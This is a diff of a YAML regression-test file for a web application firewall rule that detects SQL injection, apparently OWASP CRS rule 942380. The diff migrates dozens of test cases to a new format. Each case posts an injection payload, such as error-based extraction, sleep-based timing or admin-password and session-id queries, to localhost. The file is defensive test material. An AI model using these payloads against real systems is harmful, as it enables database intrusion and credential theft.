80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute node_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute scald" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute system" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute user_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute views" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute patha" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute workb" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute panel" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=from+information_schema.tables+where+1%3D2+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-45 + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ORder by" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ordeR by" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: 
"/post" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute php" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Execute(" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 21 + desc: "SQL Injection 
Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute+elysi" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute node_" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute scald" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute system" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute user_" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute views" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute patha" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute workb" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute panel" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 45 desc: "SQL Injection Attack: EXISTS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 